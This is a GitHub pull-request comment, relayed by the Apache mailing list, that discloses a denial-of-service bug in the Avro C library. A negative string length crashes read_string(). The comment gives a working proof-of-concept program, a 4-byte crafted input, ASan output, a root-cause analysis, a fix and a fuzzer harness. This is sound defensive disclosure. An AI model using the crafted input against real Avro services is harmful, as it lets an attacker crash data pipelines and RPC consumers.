OwenSanzas commented on PR #3622: URL: https://github.com/apache/avro/pull/3622#issuecomment-3746521711
Yes, here is the context of this crash: ## Summary Negative string length in Avro binary data causes `allocation-size-too-big` crash in `read_string()`. The function reads string length using varint/zigzag encoding which can represent negative numbers, but does not validate before passing to `avro_malloc()`. ## Version - Apache Avro C library - Tested on: current main branch - Commit: HEAD ## Steps to Reproduce ### Method 1: Using a standalone PoC program (Easiest) **Step 1**: Build Avro C library with AddressSanitizer: ```bash git clone https://github.com/apache/avro.git cd avro/lang/c mkdir build && cd build cmake .. \ -DCMAKE_C_COMPILER=clang \ -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \ -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" make -j$(nproc) ``` **Step 2**: Create `poc.c` in the build directory: ```c /* * PoC: Negative string length causes allocation-size-too-big * * This demonstrates that any application parsing Avro binary data * with a map<string> schema can crash from 4 bytes of malicious input. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <avro.h> int main(void) { /* * Malicious input: 4 bytes that crash read_string() * * When parsed as map<string>: * - 0x01: block count varint, zigzag decode = -1, negated = 1 element * - 0x00: block size varint = 0 * - 0x2f: string key length varint (47), zigzag decode = -24 * - 0x00: (padding) * * read_string() calls avro_malloc(-24 + 1) = avro_malloc(0xFFFFFFFFFFFFFFE9) */ uint8_t malicious_data[] = {0x01, 0x00, 0x2f, 0x00}; size_t data_len = sizeof(malicious_data); const char *schema_json = "{\"type\":\"map\",\"values\":\"string\"}"; printf("[*] PoC: Negative string length vulnerability (read_string)\n"); printf("[*] Schema: %s\n", schema_json); printf("[*] Malicious input: 01 00 2f 00 (4 bytes)\n"); printf("[*] The byte 0x2f (47) zigzag-decodes to -24\n\n"); avro_schema_t schema; if (avro_schema_from_json(schema_json, strlen(schema_json), &schema, NULL)) { fprintf(stderr, "[!] Failed to parse schema: %s\n", avro_strerror()); return 1; } avro_reader_t reader = avro_reader_memory((const char *)malicious_data, data_len); avro_value_iface_t *iface = avro_generic_class_from_schema(schema); avro_value_t value; avro_generic_value_new(iface, &value); printf("[*] Calling avro_value_read()... (this will crash)\n\n"); /* THIS TRIGGERS THE VULNERABILITY */ avro_value_read(reader, &value); /* Won't reach here */ avro_value_decref(&value); avro_value_iface_decref(iface); avro_reader_free(reader); avro_schema_decref(schema); return 0; } ``` **Step 3**: Build and run the PoC: ```bash clang -o poc poc.c \ -I../src \ -L./src -lavro \ -fsanitize=address \ -Wl,-rpath,./src ./poc ``` ### Method 2: Using the fuzzer **Step 1**: Build Avro C library with AddressSanitizer (same as above). **Step 2**: Save the fuzzer code below as `value_reader_fuzzer.c`. **Step 3**: Build the fuzzer: ```bash clang -g -O1 -fsanitize=address,fuzzer \ -I../src \ value_reader_fuzzer.c \ -L./src -lavro \ -Wl,-rpath,./src \ -o value_reader_fuzzer ``` **Step 4**: Create PoC input and run: ```bash # Create 4-byte malicious input # First byte 0x34 (52) selects schema index 52 % 20 = 12 = map<string> # Remaining bytes: 01 00 2f triggers the bug printf '\x34\x01\x00\x2f' > poc_input.bin ./value_reader_fuzzer poc_input.bin ``` ## Expected Behavior The Avro C library should validate that string length is non-negative and return an error for malformed data. ## Actual Behavior ``` ==PID==ERROR: AddressSanitizer: requested allocation size 0xffffffffffffffe9 (0x7f0 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x... in realloc (...) #1 0x... in read_string /path/to/avro/lang/c/src/encoding_binary.c:179:16 #2 0x... in read_map_value /path/to/avro/lang/c/src/value-read.c:103:4 #3 0x... in read_value /path/to/avro/lang/c/src/value-read.c:368:11 ... SUMMARY: AddressSanitizer: allocation-size-too-big ... in realloc ``` ## Root Cause Analysis In `lang/c/src/encoding_binary.c:172-186`, the `read_string()` function reads string length using zigzag-encoded varint: ```c static int read_string(avro_reader_t reader, char **s, int64_t *len) { int rval; int64_t str_len = 0; check_prefix(rval, read_long(reader, &str_len), "Cannot read string length: "); *len = str_len + 1; // +1 for null terminator *s = (char *) avro_malloc(*len); // BUG: str_len can be negative! ... } ``` **Control flow for crash input `34 01 00 2f`:** 1. Fuzzer input: `34 01 00 2f` (4 bytes) 2. First byte `0x34` (52) selects schema index: `52 % 20 = 12` → `map<string>` 3. `read_map_value()` reads block_count from `0x01`: - Zigzag decode: `(1 >> 1) ^ -(1 & 1) = 0 ^ -1 = -1` - Negated for map: `abs(-1) = 1` (1 element in block) 4. `read_map_value()` reads block_size from `0x00` → 0 5. `read_string()` reads key length from `0x2f` (47): - Zigzag decode: `(47 >> 1) ^ -(47 & 1) = 23 ^ -1 = -24` 6. `avro_malloc(-24 + 1)` → `avro_malloc(0xFFFFFFFFFFFFFFE9)` → CRASH **Zigzag encoding explanation:** Avro uses zigzag encoding for signed integers: - Encode: `(n << 1) ^ (n >> 63)` - Decode: `(n >> 1) ^ -(n & 1)` This means byte value `0x2f` (47) decodes to `-24`: ``` n = 47 = 0b00101111 n >> 1 = 23 n & 1 = 1 -(n & 1) = -1 = 0xFFFFFFFFFFFFFFFF result = 23 ^ -1 = -24 ``` ## Impact - **DoS**: Application crash via allocation failure - **CWE-789**: Memory Allocation with Excessive Size Value - **Affected**: Any application using Avro C library to decode untrusted binary data Attack vectors: - Avro RPC services accepting binary requests - Message queue consumers (Kafka with Avro serialization) - Data processing pipelines - Any service that deserializes Avro binary data with known schemas ## Suggested Fix > **Note**: This is a quick fix for this specific vulnerability. A comprehensive audit of all `read_long()` call sites that use decoded values for memory allocation is recommended, as similar issues may exist elsewhere in the codebase (e.g., `read_bytes()`). Add validation for negative length in `read_string()`: ```c static int read_string(avro_reader_t reader, char **s, int64_t *len) { int rval; int64_t str_len = 0; check_prefix(rval, read_long(reader, &str_len), "Cannot read string length: "); if (str_len < 0) { avro_set_error("Invalid string length: %" PRId64, str_len); return EINVAL; } *len = str_len + 1; *s = (char *) avro_malloc(*len); ... } ``` Similar validation should be added to `read_bytes()` in the same file. ## Fuzzer This issue was discovered using a custom Avro value reader fuzzer: ```c /* * Copyright 2026 O2Lab @ Texas A&M University * * Fuzzer for Avro C Value Reader * Target: avro_value_read() */ #include <stdint.h> #include <stddef.h> #include <string.h> #include <avro.h> /* Predefined schemas for fuzzing */ static const char *SCHEMAS[] = { /* Primitive types */ "\"null\"", "\"boolean\"", "\"int\"", "\"long\"", "\"float\"", "\"double\"", "\"bytes\"", "\"string\"", /* Array types */ "{\"type\": \"array\", \"items\": \"int\"}", "{\"type\": \"array\", \"items\": \"string\"}", "{\"type\": \"array\", \"items\": \"bytes\"}", /* Map types */ "{\"type\": \"map\", \"values\": \"int\"}", "{\"type\": \"map\", \"values\": \"string\"}", /* Record types */ "{\"type\": \"record\", \"name\": \"TestRecord\", \"fields\": [" "{\"name\": \"f1\", \"type\": \"int\"}," "{\"name\": \"f2\", \"type\": \"string\"}" "]}", /* Nested record */ "{\"type\": \"record\", \"name\": \"Outer\", \"fields\": [" "{\"name\": \"inner\", \"type\": {" "\"type\": \"record\", \"name\": \"Inner\", \"fields\": [" "{\"name\": \"value\", \"type\": \"long\"}" "]" "}}" "]}", /* Enum type */ "{\"type\": \"enum\", \"name\": \"Color\", \"symbols\": [\"RED\", \"GREEN\", \"BLUE\"]}", /* Fixed type */ "{\"type\": \"fixed\", \"name\": \"Hash\", \"size\": 16}", /* Union types */ "[\"null\", \"string\"]", "[\"null\", \"int\", \"long\", \"string\"]", /* Complex nested type */ "{\"type\": \"record\", \"name\": \"Complex\", \"fields\": [" "{\"name\": \"id\", \"type\": \"long\"}," "{\"name\": \"name\", \"type\": [\"null\", \"string\"]}," "{\"name\": \"tags\", \"type\": {\"type\": \"array\", \"items\": \"string\"}}," "{\"name\": \"metadata\", \"type\": {\"type\": \"map\", \"values\": \"bytes\"}}" "]}" }; static const size_t NUM_SCHEMAS = sizeof(SCHEMAS) / sizeof(SCHEMAS[0]); int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { if (size < 1) { return 0; } /* Use first byte to select schema */ size_t schema_idx = data[0] % NUM_SCHEMAS; const char *schema_json = SCHEMAS[schema_idx]; const uint8_t *binary_data = data + 1; size_t binary_size = size - 1; if (binary_size == 0) { return 0; } avro_schema_t schema = NULL; avro_value_iface_t *iface = NULL; avro_value_t value; avro_reader_t reader = NULL; int rc; rc = avro_schema_from_json_length(schema_json, strlen(schema_json), &schema); if (rc != 0 || schema == NULL) { return 0; } iface = avro_generic_class_from_schema(schema); if (iface == NULL) { avro_schema_decref(schema); return 0; } memset(&value, 0, sizeof(value)); rc = avro_generic_value_new(iface, &value); if (rc != 0) { avro_value_iface_decref(iface); avro_schema_decref(schema); return 0; } reader = avro_reader_memory((const char *)binary_data, binary_size); if (reader == NULL) { avro_value_decref(&value); avro_value_iface_decref(iface); avro_schema_decref(schema); return 0; } /* This is where the vulnerability triggers */ rc = avro_value_read(reader, &value); (void)rc; avro_reader_free(reader); avro_value_decref(&value); avro_value_iface_decref(iface); avro_schema_decref(schema); return 0; } ``` -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
